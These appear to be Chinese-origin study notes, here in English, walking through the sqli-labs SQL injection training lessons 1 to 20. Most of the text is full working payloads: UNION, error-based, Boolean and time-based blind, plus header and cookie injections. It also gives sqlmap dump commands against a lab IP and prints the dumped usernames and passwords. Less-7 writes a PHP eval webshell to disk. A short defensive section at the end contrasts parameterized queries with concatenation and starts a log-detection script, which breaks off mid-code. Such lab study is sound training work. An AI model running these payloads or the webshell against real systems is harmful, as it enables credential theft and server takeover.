sqli-labs study notes (1): Less-1 to Less-20

Straight to the point.

Less-1 GET - Error based - Single quotes - String (error-based GET single-quote string injection)

·  Method 1: manual UNION query injection

Entering a single quote makes the page return a SQL error.

Note: id= must be an invalid value.

Database-name payloads

http://43.247.91.228:84/Less-1?id=-1' union select 1,2,3 --+

http://43.247.91.228:84/Less-1?id=-1' union select 1,2,database() --+

This returns the database name 'security'.

Table-name payload

http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

or, equivalently:

http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Result: emails,referers,uagents,users; users is obviously the user table.

Column-name payload

http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Value payload

http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

0x3a: 0x marks a hexadecimal literal, and 3a is 58 in decimal, which is ':' in ASCII; it separates username from password.

Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4

·  Method 2: manual error-based injection

Error-based detection payloads

?id=1' and 1=1--+    // works

?id=1' and 1=2--+    // fails

Note: id= must be a valid value.

Table-name payload

http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

Column-name payload

http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

Value payload

http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+

Clearly the output is incomplete (the XPath error message only shows the first 32 characters), so exclude the rows already seen:

http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+

·  Method 3: automated injection with sqlmap

sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1"

sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" --dbs

sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" -D security --tables

sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" -D security -T users --columns

sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" -D security -T users -C username,password --dump

Less-2 GET - Error based - Intiger based (error-based GET integer injection)

· Method 1: manual UNION query injection

Check for the error:

http://43.247.91.228:84/Less-2/?id=1 and 1=1

http://43.247.91.228:84/Less-2/?id=1 and 1=2

Find the displayed columns

http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,3

Dump table names

http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

Dump column names

http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

Dump records

http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users

· Method 2: manual error-based injection

Dump table names

http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))

Dump column names

http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))

Dump records

http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))

Output incomplete, so exclude the rows already seen:

http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina'))))

· Method 3: sqlmap

sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" --dbs

sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" -D security --tables

sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" -D security -T users --columns

sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" -D security -T users -C username,password --dump

Less-3 GET - Error based - Single quotes with twist string (error-based GET single-quote string injection with a twist)

· Method 1: manual UNION query injection

A single quote followed by ) triggers the error:

http://43.247.91.228:84/Less-3/?id=1') and 1=1 --+

http://43.247.91.228:84/Less-3/?id=1') and 1=2 --+

Find the displayed columns

id must be an invalid value

http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,3 --+

Dump table names

http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Dump column names

http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Dump records

http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+

·  Method 2: manual error-based injection

Dump table names

id must be a valid value

http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

Dump column names

http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

Dump records

http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+

Output incomplete, so exclude the rows already seen:

http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+

· Method 3: automated injection with sqlmap

sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1"

sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" --dbs

sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" -D security --tables

sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" -D security -T users --columns

sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" -D security -T users -C username,password --dump

Less-4 GET - Error based - Double Quotes - String (error-based GET double-quote string injection)

· Method 1: manual UNION query injection

Check for the error

http://43.247.91.228:84/Less-4/?id=1") and 1=1 --+

http://43.247.91.228:84/Less-4/?id=1") and 1=2 --+

Find the displayed columns

id must be an invalid value

http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,3 --+

Dump table names

http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Dump column names

http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Dump records

http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+

·  Method 2: manual error-based injection

Dump table names

id must be a valid value

http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

Dump column names

http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

Dump records

http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+

Output incomplete, so exclude the rows already seen:

http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+

· Method 3: automated injection with sqlmap

sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1"

sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" --dbs

sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" -D security --tables

sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" -D security -T users --columns

sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" -D security -T users -C username,password --dump

Less-5 GET - Double Injection - Single Quotes - String (double-query GET single-quote string injection)

· Method 1: manual time-based injection

In time-based injection a true condition delays the response and a false one does not.

Verify the time-based blind injection

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+

A clear delay is observed.

Database-name length payload

http://43.247.91.228:84/Less-5/?id=1' and if(length(database())=8,sleep(5),1) --+

Database-name payload

http://43.247.91.228:84/Less-5/?id=1' and if(left(database(),1)='s',sleep(5),1) --+

Table-name payload

http://43.247.91.228:84/Less-5/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1)--+

Column-name payload

http://43.247.91.228:84/Less-5/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(5),1)--+

Data payload

http://43.247.91.228:84/Less-5/?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb',sleep(5),1)--+

http://43.247.91.228:84/Less-5/?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb',sleep(5),1)--+

Note that MySQL's default string comparison is case-insensitive, so you cannot tell whether the value is Dumb or dumb.

· Method 2: manual Boolean-based injection

In Boolean-based injection a true condition shows the normal page and a false one shows nothing; use that to brute-force the value one character at a time.

Database-name payload

http://43.247.91.228:84/Less-5/?id=1' and left((select database()),1)='s' --+

Table-name payload

http://43.247.91.228:84/Less-5/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+

Column-name payload

http://43.247.91.228:84/Less-5/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+

Field-value payload

http://43.247.91.228:84/Less-5/?id=1' and left((select username from users limit 0,1),1)='d' --+

Again, MySQL's default string comparison is case-insensitive, so you cannot tell whether the value is Dumb or dumb.

· Method 3: sqlmap

sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1"

sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" --dbs

sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" -D security --tables

sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" -D security -T users --columns

sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" -D security -T users -C username,password --dump

Less-6 GET - Double Injection - Double Quotes - String (double-query GET double-quote string injection)

· Method 1: manual time-based injection

Check for the delay

http://43.247.91.228:84/Less-6/?id=1" and sleep(5) --+

Then guess one character at a time.

Dump the database name

http://43.247.91.228:84/Less-6/?id=1" and if(left(database(),1)='s',sleep(5),1) --+

Dump the table name

http://43.247.91.228:84/Less-6/?id=1" and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1) --+

Dump the column name

http://43.247.91.228:84/Less-6/?id=1" and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(5),1) --+

Dump the record

http://43.247.91.228:84/Less-6/?id=1" and if(left((select username from users limit 0,1),1)='d',sleep(5),1) --+

· Method 2: manual Boolean-based injection

A true condition returns the page, a false one returns nothing.

Dump the database name

http://43.247.91.228:84/Less-6/?id=1" and left((select database()),1)='s' --+

Dump the table name

http://43.247.91.228:84/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+

Dump the column name

http://43.247.91.228:84/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+

Dump the record

http://43.247.91.228:84/Less-6/?id=1" and left((select username from users limit 0,1),1)='d' --+

· Method 3: sqlmap

sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1"

sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" --dbs

sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security --tables

sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security -T users --columns

sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security -T users -C username,password --dump

Less-7 GET - Dump into outfile - String (GET string injection that writes to a file)

Quick aside: default web roots

Windows Server IIS: c:\Inetpub\wwwroot

Linux nginx: usually /usr/local/nginx/html, /home/wwwroot/default, /usr/share/nginx or /var/www/htm

Apache: .../var/www/htm, .../var/www/html, .../htdocs

phpStudy: ...\PhpStudy20180211\PHPTutorial\WWW\

XAMPP: ...\xampp\htdocs

load_file() for reading files

load_file(file_name): reads the file and returns its contents as a string.

Requirements:

A. The account must have read privileges and the file must be fully readable

and (select count(*) from mysql.user)>0/* if this returns normally, the account has read/write privileges.

and (select count(*) from mysql.user)>0/* if it returns an error, the administrator has probably reduced the privileges of the database account

B. The file must be on the database server

C. The full path to the file must be given

D. The file must be smaller than max_allowed_packet

Use the Less-2 injection directly to obtain the paths

http://43.247.91.228:84/Less-2/?id=-1 union select 1,@@basedir,@@datadir --+

Injecting Less-7

Payload

?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "F:\\WhiteFlie\\PhpStudy20180211\\PHPTutorial\\WWW\\sqli-labs\\a.php"--+

The leading part is the site's absolute path.

Although the page shows an error, checking the local file shows that the one-line webshell has been written.

Connect with China Chopper.

Note that this method requires MySQL's secure-file-priv setting to permit writing files; otherwise the file cannot be written.

Less-8 GET - Blind - Boolian Based - Single Quotes (Boolean-based GET single-quote blind injection)

Check for the error

http://43.247.91.228:84/Less-8/?id=1' and 1=1 --+

http://43.247.91.228:84/Less-8/?id=1' and 1=2 --+

Guess the database-name length

http://43.247.91.228:84/Less-8/?id=1' and length(database())=8 --+

Guess the database name

http://43.247.91.228:84/Less-8/?id=1' and left((select database()),1)='s' --+

http://43.247.91.228:84/Less-8/?id=1' and left((select database()),8)='security' --+

Guess the table name

http://43.247.91.228:84/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' --+

Guess the column name

http://43.247.91.228:84/Less-8/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+

Guess the record

http://43.247.91.228:84/Less-8/?id=1' and left((select username from users limit 0,1),1)='d' --+

Less-9 GET - Blind - Time based. -  Single Quotes  (time-based GET single-quote blind injection)

Check for the delay

http://43.247.91.228:84/Less-9/?id=1' and sleep(3) --+

Guess the database-name length

http://43.247.91.228:84/Less-9/?id=1' and if(length(database())=8,sleep(3),1) --+

Guess the database name

http://43.247.91.228:84/Less-9/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+

Guess the table name

http://43.247.91.228:84/Less-9/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+

Guess the column name

http://43.247.91.228:84/Less-9/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+

Guess the record

http://43.247.91.228:84/Less-9/?id=1' and if(left((select username from users limit 0,1),1)='d',sleep(3),1) --+

Less-10 GET - Blind - Time based - double quotes (time-based GET double-quote blind injection)

Check for the delay

http://43.247.91.228:84/Less-10/?id=1" and sleep(3) --+

Guess the database-name length

http://43.247.91.228:84/Less-10/?id=1" and if(length(database())=8,sleep(3),1) --+

Guess the database name

http://43.247.91.228:84/Less-10/?id=1" and if(left((select database()),1)='s',sleep(3),1) --+

Guess the table name

http://43.247.91.228:84/Less-10/?id=1" and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+

Guess the column name

http://43.247.91.228:84/Less-10/?id=1" and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+

Guess the record

http://43.247.91.228:84/Less-10/?id=1" and if(left((select username from users limit 0,1),1)='d',sleep(3),1) --+

Less-11 POST - Error Based - Single quotes- String (error-based POST single-quote string injection)

Logging in as user Dumb with password Dumb shows the following.

Log in with admin / admin, capture the request and send it to the Repeater module.

· Method 1: test payloads for extractvalue

uname=admin' and 1=1 --+ &passwd=admin&submit=Submit // login succeeds

uname=admin' and 1=2 --+ &passwd=admin&submit=Submit // login fails

This shows the injection works and error-based injection is possible; the rest is the same routine again with extractvalue().

Database-name payload

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

Table-name payload

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

Column-name payload

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

Value payload

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

Use not in to retrieve the remaining values.

· Method 2: test payloads for union select

Find the displayed columns

Note: uname must be a non-existent user, otherwise the UNION rows are not displayed.

uname=0' union select 1,2  --+&passwd=admin&submit=Submit

Database-name payload

uname=-1' union select 1,database() --+&passwd=admin&submit=Submit

Table-name payload

uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit

Column-name payload

uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=admin&submit=Submit

Record payload

uname=-1' union select 1,group_concat(username,0x3a,password) from users --+&passwd=admin&submit=Submit

Less-12 POST - Error Based - Double quotes- String-with twist (error-based POST double-quote string injection with a twist)

The SQL query:

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Construct a payload that closes the statement and also raises an error:

admin"  and extractvalue(1,concat(0x7e,(select database())))  and " 

After the code wraps it in double quotes, uname is "admin"  and extractvalue(1,concat(0x7e,(select database())))  and " "

Submitted, it becomes:

uname=admin" and extractvalue(1,concat(0x7e,(select database())))  and " &passwd=admin&submit=Submit

· Method 1: test payloads for extractvalue

Database-name payload

uname=admin" and extractvalue(1,concat(0x7e,(select database())))  and " &passwd=admin&submit=Submit

Table-name payload

uname=admin"  and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and "  &passwd=admin&submit=Submit

Column-name payload

uname=admin"  and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))  and "  &passwd=admin&submit=Submit

Value payload

uname=admin"  and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users)))  and "  &passwd=admin&submit=Submit

Use not in to retrieve the values that were not displayed.

· Method 2: test payloads for union select

Find the displayed columns

uname=0") union select 1,2 --+&passwd=admin&submit=Submit

Database-name payload

uname=0") union select 1,database() --+&passwd=admin&submit=Submit

Table-name payload

uname=0") union select 1, group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit

Column-name payload

uname=0") union select 1, group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=admin&submit=Submit

Value payload

uname=0") union select 1, group_concat(username,0x3a,password) from users --+&passwd=admin&submit=Submit

· Method 3: the cheap trick

The error message reads:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin") LIMIT 0,1' at line 1

It shows that a double quote and a parenthesis are appended after our input.

From this, build the universal-password payload:

Username: admin")#

Password: anything

Less-13 POST - Double Injection - Single quotes- String -twist (POST single-quote twist double-query injection)

· Method 1: error-based injection

Table-name payload

uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and (' &passwd=admin&submit=Submit

or

uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ &passwd=admin&submit=Submit

Column-name payload

uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+ &passwd=admin&submit=Submit

Value payload

uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+ &passwd=admin&submit=Submit

Output incomplete, so exclude the rows already seen:

uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+ &passwd=admin&submit=Submit

· Method 2: time-based blind injection

Since error-based injection already works, this method, which gives no output, is of little use; a sample payload:

uname=admin') and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit

Less-14 POST - Double Injection - Single quotes-  String -twist (POST single-quote twist double-query injection)

Method 1: error-based injection

Database-name payload

uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit

Table-name payload

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit

Column-name payload

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit

Value payload

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and " &passwd=admin&submit=Submit

Method 2: time-based blind injection

Inefficient and of little use here.

Sample payload

uname=admin" and if(left(database(),1)='s',sleep(3),1) --+ &passwd=admin&submit=Submit

Method 3: aggregate function (double query)

Depends on randomness, so it is unreliable.

Sample payload

uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd=admin&submit=Submit

Less-15 POST - Blind- Boolian/time Based - Single quotes (Boolean/time-based POST single-quote blind injection)

Time-delay test payload

uname=admin' and sleep(5) --+&passwd=admin&submit=Submit

Clear delay, so time-based injection it is.

Manual time-based injection is the most painful kind.

Database-name length payload

uname=admin' and if(length(database())=8,sleep(3),1) --+&passwd=admin&submit=Submit

Database-name payload

uname=admin' and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit

Table-name payload

uname=admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+&passwd=admin&submit=Submit

Column-name payload

uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+&passwd=admin&submit=Submit

Value payload

uname=admin' and if(left((select username from users limit 0,1),1)='D',sleep(3),1) --+&passwd=admin&submit=Submit

uname=admin' and if(left((select username from users limit 0,1),4)='Dumb',sleep(3),1) --+&passwd=admin&submit=Submit

Less-16 POST - Blind- Boolian/Time Based - Double quotes (Boolean/time-based POST double-quote blind injection)

Time-delay check

uname=admin") and sleep(3) --+&passwd=admin&submit=Submit

Clear delay.

Database-name length

uname=admin") and if(length(database())=8,sleep(3),1) --+&passwd=admin&submit=Submit

Database name

uname=admin") and if(left((select database()),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit

Table name

uname=admin") and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+&passwd=admin&submit=Submit

Column name

uname=admin") and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+&passwd=admin&submit=Submit

Value

uname=admin") and if(left((select username from users limit 0,1),1)='D',sleep(3),1) --+&passwd=admin&submit=Submit

· Method 2: the cheap trick

Universal username that bypasses the password check: admin")#

Injection done.

Less-17 POST - Update Query- Error Based - String (error-based POST injection in an UPDATE query)

Here uname is run through check_input.

After all that fancy filtering, they never applied it to password.

So go after password:

Use updatexml(), the sibling of extractvalue().

Test with version(), which returns the MySQL version

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,version(),0x7e),1) --+&submit=Submit

Database-name payload

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) --+&submit=Submit

Table-name payload

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+&submit=Submit

Column-name payload

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) --+&submit=Submit

Value payload

Using uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+ &submit=Submit

does not work, because MySQL refuses to read from the table that the same UPDATE statement is modifying; wrap the subquery in another select so it reads from a derived table instead:

uname=admin&passwd=admin' and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin'))),1) --+ &submit=Submit

The derived table also needs an alias (MySQL: "Every derived table must have its own alias"):

uname=admin&passwd=11'  and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1) --+&submit=Submit

or

uname=admin&passwd=11'  and  updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) --+&submit=Submit
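To show why the Less-11 login payloads and the Less-17 "filter uname but not password" mistake work, here is an added example that is not code from the original notes or from sqli-labs: it rebuilds the lab's login query over an in-memory SQLite table three ways, plain string concatenation, concatenation with only uname escaped (the Less-17 situation), and a parameterized query. SQLite stands in for MySQL, escape_quotes is an assumed, simplified stand-in for the lab's check_input, and the user rows are constructed.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the sqli-labs `users` table (three of the rows the
    Less-1 dump showed); an in-memory SQLite database replaces MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")],
    )
    return conn


def escape_quotes(value: str) -> str:
    """Assumed, simplified stand-in for check_input(): doubling the quote is the
    SQLite equivalent of the backslash escaping mysql_real_escape_string does."""
    return value.replace("'", "''")


def login_concat(conn, uname: str, passwd: str, escape_uname: bool = False):
    """The lab's query shape (Less-11/15): values pasted straight into the SQL text.
    With escape_uname=True it mirrors Less-17, where only uname goes through check_input."""
    if escape_uname:
        uname = escape_quotes(uname)
    sql = (
        "SELECT username, password FROM users WHERE username='" + uname
        + "' and password='" + passwd + "' LIMIT 0,1"
    )
    return conn.execute(sql).fetchone()


def login_prepared(conn, uname: str, passwd: str):
    """Hardened form: placeholders keep both inputs as data, whatever they contain."""
    sql = "SELECT username, password FROM users WHERE username=? and password=? LIMIT 0,1"
    return conn.execute(sql, (uname, passwd)).fetchone()


# The two inputs exercised: the Less-11 tautology through uname (SQLite's comment
# marker is "-- ", so "--+" becomes "-- " after URL decoding), and the Less-17 idea of
# going through the one field that was never filtered.
UNAME_TAUTOLOGY = "admin' and 1=1 -- "
PASSWD_TAUTOLOGY = "x' or 1=1 -- "


def demo() -> dict:
    """Run every combination and return the row each login attempt produced."""
    conn = build_db()
    return {
        # concatenation: the uname payload comments out the password check
        "concat_uname_injected": login_concat(conn, UNAME_TAUTOLOGY, "wrong"),
        # escaping uname alone stops that one payload ...
        "concat_uname_escaped": login_concat(conn, UNAME_TAUTOLOGY, "wrong", escape_uname=True),
        # ... but the unescaped password field still logs in as the first row
        "concat_passwd_injected": login_concat(conn, "admin", PASSWD_TAUTOLOGY, escape_uname=True),
        # parameterized: both payloads are just strings that match no user
        "prepared_uname": login_prepared(conn, UNAME_TAUTOLOGY, "wrong"),
        "prepared_passwd": login_prepared(conn, "admin", PASSWD_TAUTOLOGY),
        # and a real credential pair still works
        "prepared_real": login_prepared(conn, "admin", "admin"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:24s} -> {row}")
```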


Less-18 POST - Header Injection - Uagent field - Error based (error-based POST header injection via User-Agent)

The page echoes the User-Agent, so the injection point is presumably User-Agent and can be tested directly.

Database-name payload

User-Agent: ' and extractvalue(1,concat(0x7e,database())) and '

Table-name payload

User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '

Column-name payload

User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '

Value payload

User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and '

Output incomplete, so exclude the rows already seen:

User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) and '

Less-19 POST - Header Injection - Referer field - Error based (error-based POST header injection via Referer)

Database-name payload

Referer: ' and extractvalue(1,concat(0x7e,database())) and '

Table names

Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '

Column names

Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '

Values

Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and '

Output incomplete, so exclude the rows already seen:

Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) and '

Less-20 POST - Cookie injections - Uagent field  - Error based (error-based POST cookie injection)

Page after login:

Seeing the cookie uname=admin, there is no doubt this is cookie injection.

Capture a request that carries the cookie.

Add a single quote

Cookie: uname=admin'

A syntax error is returned, so this is the single-quote type.

Find the column count

Cookie: uname=admin' order by 3 --+      // normal

Cookie: uname=admin' order by 4 --+       // error, so there are 3 columns

Database-name payload

Note: uname must be an invalid value

Cookie: uname=-admin' union select 1,2,database() --+

Table names

Cookie: uname=-admin' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Column names

Cookie: uname=-admin' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Values

Cookie: uname=-admin' union select 1,2,group_concat(username,0x3a,password) from users --+
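As a defensive counterpart to the GET lessons (Less-1 to Less-10) and the header lessons (Less-18 to Less-20), here is an added detection example, not code from the original notes or from sqli-labs: it scans constructed nginx access-log lines for the UNION, error-based, time-based, information_schema and file-write signatures the payloads above leave behind, in the request line as well as in the Referer, User-Agent and Cookie fields. The log format (the combined format plus a trailing quoted $http_cookie field) and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection families used against sqli-labs in these notes:
# UNION-based, error-based (extractvalue/updatexml), time-based (sleep/benchmark),
# metadata enumeration via information_schema, and file read/write (Less-7).
SIGNATURES = {
    "union": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "error": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "time": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
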